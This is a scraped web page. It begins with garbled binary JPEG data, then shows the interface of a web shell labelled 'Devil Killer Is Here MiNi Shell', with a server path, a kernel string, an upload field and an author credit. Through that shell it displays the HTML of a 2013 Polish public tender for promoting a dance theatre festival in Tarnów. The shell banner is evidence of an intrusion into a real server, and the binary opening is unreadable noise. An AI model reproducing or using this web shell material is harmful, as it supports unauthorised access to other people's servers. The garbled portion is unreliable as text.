JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130812/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130812/325304-N-2013.html

<p class="kh_header"><b>Tarnów: Promocja projektu o nazwie -Międzynarodowy Festiwal Teatrów Tańca SCENA OTWARTA-</b><br>
<b>Numer ogłoszenia: 325304 - 2013; data zamieszczenia: 12.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Sztuki Mościce , ul. Traugutta 1, 33-101 Tarnów, woj. małopolskie, tel. 014 6334600, faks 014 6331052.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csm.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Promocja projektu o nazwie -Międzynarodowy Festiwal Teatrów Tańca SCENA OTWARTA-.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na promocji projektu o nazwie -Międzynarodowy Festiwal Teatrów Tańca SCENA OTWARTA-:

Zamówienie zostało podzielone na 3 części (zadania):

Część nr 1 - Obsługa promocyjna i prasowa.
Część nr 2 - Poligrafia.
Część nr 3 - Outdoor i usługi plakatowania

Część A. OBSŁUGA PROMOCYJNA I PRASOWA
1. 	Reklama prasowa w dzienniku ogólnopolskim o wydaniach regionalnych o średnim nakładzie jednorazowym  pow. 300 tys. Ogłoszenie wielkości cała strona, pełnokolorowe w dodatku poświęconym wydarzeniom kulturalnym ukazującym się w terminie 04.10. br, w wydaniu Kraków. Przygotowanie reklamy na podstawie materiałów otrzymanych od Zamawiającego i w uzgodnieniu z Zamawiającym. Odbiór na podstawie raportu wydawcy i egzemplarza czasopisma. 
2.  Reklama prasowa o Festiwalu w miesięczniku ogólnopolskim  poświęconym teatrowi współczesnemu o nakładzie min. 1000 egzemplarzy. Całostronicowa, kolorowa, 3 lub 4 strona okładki. Termin realizacji: wydanie październikowe. Przygotowanie reklamy na podstawie materiałów otrzymanych od Zamawiającego i w uzgodnieniu z Zamawiającym. Odbiór na podstawie egzemplarza miesięcznika.
3. 	Reklama prasowa o Festiwalu w ogólnopolskim magazynie muzycznym zajmującym się problematyką muzyki klasycznej, opery, baletu. Całostronicowa, kolorowa. Termin realizacji: wydanie obejmujące październik. Przygotowanie reklamy na podstawie materiałów otrzymanych od Zamawiającego i w uzgodnieniu z Zamawiającym. Odbiór na podstawie egzemplarza miesięcznika.
4.	Obsługa dziennikarska festiwalu -  obejmować powinna:
a) przygotowanie konferencji prasowej trwającej ok 40 min. zapowiadającej  Festiwal. Konferencja powinna odbyć się w lokalu z możliwością wykorzystania rzutnika multimedialnego i nagłośnienia prezentowanych za pomocą rzutnika materiałów. Wybrany lokal powinien zapewniać odpowiednie warunki techniczne i estetyczne do rejestracji filmowej, fotograficznej i dźwiękowej. Lokal powinien znajdować się w Tarnowie, w miejscu łatwym komunikacyjnie dla dziennikarzy. Propozycje wyboru lokalu Wykonawca uzgodni z Zamawiającym.  
b) konferencja powinna odbyć się w terminie  pomiędzy 23-27 09.2013 r. 
c) konferencja powinna obejmować słowną i filmową prezentację informacji o Festiwalu oraz materiały dla dziennikarzy zapisane w wersji elektronicznej na płytach DVD w nakładzie 20 szt.  Materiały drukowane oraz filmowe na konferencję zapewni Zamawiający;
d) plan Konferencji będzie przygotowany i prowadzony przez doświadczoną i znaną (minimum 5 lat pracy w branży) dziennikarkę lub dziennikarza, na co dzień pracujących z żywym słowem.  Konferencje powinna być atrakcyjna w formie i sugestywnie prezentować plan Festiwalu, wysoki poziom artystyczny prezentowanych spektakli i gości Festiwalu oraz źródła finansowania;
e) w  konferencji udział weźmie co najmniej 10 reprezentantów lokalnych mediów.  Wykonawca przedstawi Zamawiającemu pisemną listę obecności na konferencji zawierającą imię i nazwisko dziennikarza, nazwę medium jakie reprezentuje oraz podpis;
f) zakres merytoryczny konferencji i materiałów Wykonawca uzgodni z Zamawiającym;
g) przygotowywanie recenzji prasowych ze spektakli i wydarzeń festiwalowych (warsztaty taneczne zakończone spektaklem - odbywające się 16-27.09 i 10-16.10.2013 r.; - 8 spektakli, przegląd filmowy -Dance - my life and love-, wystawa fotograficzna Knuta Bry, premiera portalu internetowego www.DanceGuide.eu  - odbywające się w dniach 11-13, 18-19, 25-27 października 2013 w  siedzibie Zamawiającego). Autorem recenzji powinna być osoba mająca doświadczenie krytyczne i wiedzę z zakresu teatru tańca.  Teksty recenzji powinny mieć objętość średnio ok. 3000 znaków. Powinny być zamieszczane na stronie www Festiwalu  najpóźniej 24 godziny po opisanym wydarzeniu; 
h) niezwłoczne zamieszczanie materiałów na stronie Festiwalu (www.scenaotwarta.pl - prowadzonej przez Zamawiającego);
i) przekazanie praw autorskich do ww tekstów na rzecz Zamawiającego.
5.	Obsługa fotograficzna festiwalu -  obejmować powinna:
a) realizacja reportaży fotograficznych ze spektakli i wydarzeń festiwalowych (opisanych w pkt 4 g) oraz spotkań z publicznością po spektaklach. Reportaże powinny być zamieszczane na stronie www Festiwalu  najpóźniej 24 godziny po wydarzeniu
b) każdy reportaż powinien zawierać min 20 zdjęć;
c) zamieszczanie reportaży na stronie internetowej Festiwalu w rozdzielczości min 800 pixeli dłuższego boku;   (www.scenaotwarta.pl - prowadzonej przez Zamawiającego);
d) reportaże powinny także uwzględniać informację o sposobie finansowania Festiwalu z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii, środków Min.KiDN pochodzących z budżetu państwa oraz ze środków Województwa Małopolskiego;
e) przekazanie praw autorskich do ww fotografii na rzecz Zamawiającego;
f) przekazanie całości materiału fotograficznego w postaci plików elektronicznych w oryginalnych rozdzielczościach, ale mnie mniejszych niż ok. 4288x2848 pixeli.
6.	Obsługa filmowa festiwalu -  obejmować powinna:
a) realizacja reportaży filmowych ze spektakli (w zależności od  wyrażanej zgody zespołu teatralnego i wydarzeń festiwalowych (opisanych w pkt 4 g) oraz spotkań z publicznością po spektaklach; Zamawiający na etapie realizacji przekaże Wykonawcy specyfikację spektakli i dopuszczalnego czasu rejestracji filmowej;
b) każdy reportaż powinien trwać ok 10 minut;
c) powinien być zrealizowany w technice HD, dźwięk zarejestrowany z wykorzystaniem mikrofonów dostosowanych do charakteru rejestrowanego zdarzenia;
d) niezwłoczne (najpóźniej 24 godziny po sfilmowanym wydarzeniu.) zamieszczanie reportaży na stronie internetowej Festiwalu  (www.scenaotwarta.pl - prowadzonej przez Zamawiającego);
e) reportaże powinny także uwzględniać informację o sposobie finansowania Festiwalu z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii, środków Min.KiDN pochodzących z budżetu państwa oraz ze środków Województwa Małopolskiego;
f) przekazanie praw autorskich do ww materiału filmowego na rzecz Zamawiającego;
g) przekazanie całości materiału filmowego w postaci plików elektronicznych.


Część B. POLIGRAFIA
1. 	Druk plakatu Festiwalu, format B1, kolor CMYK. Papier 150 g/m2 Nakład: 500 szt. Nadruk wg projektu dostarczonego. Termin realizacji: do 23.09.2013. Dostawa do siedziby Zamawiającego. 
2. 	Druk plakat Festiwalowego, format B2, kolor CMYK. Papier 150 g/m2 Nakład 400 szt. Nadruk wg projektu dostarczonego. Termin realizacji: do 23.09.2013.. Dostawa do siedziby Zamawiającego. 
3. 	Druk katalogu programowego Festiwalu. Druk i dostawa. Format netto 21x21 cm. Druk całości w kolorze CMYK + lakier zabezpieczający. Papier na blok katalogu: 170 g/m2. Ilość stron w bloku: 40. Okładka karton 300 g/m2. Oprawa broszurowa, szyta drutem w dwóch miejscach.  Nakład: 600 szt. Nadruk wg projektu dostarczonego. Termin realizacji: 23.09.2013. Dostawa do siedziby Zamawiającego. 
4. 	Druk ulotki z programem Festiwalu (Info o programie, zespołach, wystawach). Skład, druk, dostawa. Format DL, dwustronnie, kolor CMYK + lakier. Papier: 170 g/m2. Nakład: 5000 szt. Nadruk wg projektu dostarczonego. Termin realizacji:  do 23.09.2013.. Dostawa do siedziby Zamawiającego. 
5. 	Druk zaproszeń na imprezy Festiwalowe. Skład, druk, dostawa. Format  DL. Druk cyfrowy. Papier: 250 g/m2. Druk pełnokolorowy, jednostronny. Nakład: 10 rodzajów po 120 szt. Nadruk wg projektu dostarczonego.  Termin realizacji: do 23.09. 2013. Dostawa do siedziby Zamawiającego. 
6. 	Produkcja i dostawa reklamowych toreb tekstylnych. Torba czarna, z dnem. Format ok. 42 x 10 x 38 cm. Nadruk pełnokolorowy, fotorealistyczny, do wielkości formatu A4, na jednej stronie. Grafika identyfikacyjna + info dot. finansowania  z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii, środków Min.KiDN pochodzących z budżetu państwa oraz ze środków Województwa Małopolskiego.. Nakład: 300 szt. Nadruk wg projektu dostarczonego. Termin realizacji: 23.09.2013. Dostawa do siedziby Zamawiającego.
7.	Produkcja identyfikatorów Festiwalu. Format: ok. 90 mm x 56 mm. Sztywna osłona identyfikatora, pasek plastikowy (o szerokości ok 12 mm) z metalowym klipsem mocującym. Zadruk identyfikatora: dwustronny, pełnokolorowy.  Nadruk wg projektu dostarczonego. Ilość całkowita: 300 szt; wg następujących grup: Organizator - 10 szt, Wykonawca - 140 szt, Obsługa - 40 szt, Media - 50 szt, Gość - 60 szt. Termin realizacji: 12.10.2013. Dostawa do siedziby Zamawiającego.
8.	Dostawa koszulek typu T-shirts. Nadruk pełnokolorowy, fotorealistyczny, do wielkości formatu A4.  Ilość: 300 szt. Koszulki w kolorze czarnym. Z wysokogatunkowej bawełny, jednołożyskowej, gramatura 150-155 g/m2, bez szwów bocznych, taśma wzmacniająca szwy rękawów Rozmiary: S: 20, M: 20, L: 180, XL: 50, XXL: 30 szt. Pakowane w woreczki. Nadruk wg projektu dostarczonego. Termin realizacji: do 23.09.2013. Dostawa do siedziby Zamawiającego.
9.	Wykonanie pełnokolorowej reklamy na roll-up ie.  Format 200x100 cm. Kaseta typu lux, szt 2.  Wykonanie wg dostarczonego projektu. Termin realizacji 23.09.2013.

Część C. OUTDOOR i USŁUGI PLAKATOWANIA
1. 	Billboardy - druk i dzierżawa plansz na terenie Tarnowa i Krakowa. Format: 504x238 cm. Ilość: Tarnów 10 szt., Kraków 5 szt. Druk pełnokolorowy. Nadruk wg projektu dostarczonego. Lokalizacje tablic należy uzgodnić z Zamawiającym. Termin ekspozycji: minimum 01-28.10. 2013. Odbiór na podstawie raportu właściciela nośników i dokumentacji fotograficznej.
2.	Wykonanie (druk, montaż i demontaż) wielkoformatowej reklamy na budynku CSM w formie kolorowej, wycinanej wyklejki na szybach frontonu budynku. Wielkość szyb: ok.  12,1 x 2,5 m; powierzchnia reklamy: minimum 12 m2. Wg projektu dostarczonego.  Ekspozycja od 7.10.2012. Demontaż: 29-30.10.2013. Odbiór wykonania w siedzibie Zamawiającego. 
3.	Usługa plakatowania plakatów B1 (w pionie) na terenie Tarnowa pasek po 6 plakatów, na 10 słupach. Termin ekspozycji minimum: 27.09. - 27. 10. 2013. Plakaty dostarcza Zamawiający. Odbiór na podstawie raportu od firmy plakatującej lub dokumentacji fotograficznej realizacji usługi. 
4.	Usługa plakatowania plakatów B2 na terenie Tarnowa. 10 plakatowań po 30 szt, razem 300 szt w okresie 27.09.do 22.10. 2013 r. Plakaty dostarcza Zamawiający. Odbiór na podstawie raportu od firmy plakatującej lub dokumentacji fotograficznej realizacji usługi.
5.	Usługa plakatowania na terenie Krakowa. Dzierżawa i plakatowanie  plakatami Festiwalu o formacie B1 jednego słupa w centrum Krakowa na okres 4 tygodni, rozpoczynający się od ok 30.09.2013 r. Propozycje lokalizacji słupa należy uzgodnić z Zamawiającym. Odbiór na podstawie raportu od firmy plakatującej/ dzierżawiącej lub dokumentacji fotograficznej realizacji usługi. 
6.	Usługa plakatowania na terenie Warszawy. Dzierżawa i plakatowanie  plakatami Festiwalu o formacie B1 jednego słupa w Warszawie, w dzielnicy Śródmieście na okres 4 tygodni, rozpoczynający się od ok 30.09.2013 r. Propozycje lokalizacji słupa należy uzgodnić z Zamawiającym. Odbiór na podstawie raportu od firmy plakatującej/ dzierżawiącej lub dokumentacji fotograficznej realizacji usługi. 

UWAGA:
Zamawiający nie ma określonych adresów nośników billboardowych.


Uwaga: Zamawiający dopuszcza oferowane przez Wykonawców towary, których wymiary różnią się o +/-5% od wymiarów wskazanych w opisie przedmiotu zamówienia. 
Zastrzega się, iż przy odbiorze przedmiotu zamówienia Zamawiający będzie dokładnie sprawdzał zgodność dostarczanych przez Wykonawcę towarów z opisem przedstawionym w SIWZ. Jakiekolwiek niezgodności pomiędzy zamawianym przez Zamawiającego a dostarczonym przez Wykonawcę towarem spowodują odmowę przyjęcia towaru. Jednocześnie termin wykonania zamówienia, czyli dostawy towarów zgodnych z opisem zawartym w SIWZ nie zostanie przedłużony.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.34.22.00-5, 79.97.00.00-4, 39.29.41.00-0, 79.80.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku. Zamawiający dokona oceny spełniania warunku na podstawie analizy treści oświadczenia, o którym mowa w pkt. III.4.1.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu w oryginale pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
2.	Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem (wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert).
3.	W przypadku, gdy uprawnienie do podpisania oferty, oświadczeń i dokumentów nie wynika z dokumentu, o którym mowa w pkt III.4.2 tiret drugi, do oferty należy załączyć stosowne upoważnienie (pełnomocnictwo) lub inny dokument, z którego wynika uprawnienie do podpisania oferty.
4.	W celu wykazania, że wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 2 ustawy przedkłada oświadczenia i dokumenty określone w pkt. III.4.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Przewiduje się zmiany umowy w zakresie terminu wykonania usług, w przypadku wystąpienia obiektywnych przesłanek niezależnych od wykonawcy i zamawiającego, a powodujących niemożność dochowania terminu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.csm.tarnow.pl zakładka -o nas- / -przetargi-<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Sztuki Mościce, ul. Traugutta 1, 33-101 Tarnów, sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 10:00, miejsce: Centrum Sztuki Mościce, 33-101 Tarnów, ul. Traugutta 1, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Zamawiający nie przewiduje zawarcia umowy ramowej oraz ustanowienia dynamicznego systemu zakupów. 
2.	Projekt pt. Międzynarodowy Festiwal Teatrów Tańca SCENA OTWARTA finansowany jest z funduszy EOG, pochodzących z Islandii, Liechtensteinu i Norwegii, środków Min.KiDN pochodzących z budżetu państwa oraz ze środków Województwa Małopolskiego. 
3.	Szczegółowe terminy wykonania poszczególnych zadań określa szczegółowy opis przedmiotu zamówienia (pkt II.1.4) ogłoszenia) oraz załącznik nr 4 do SIWZ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com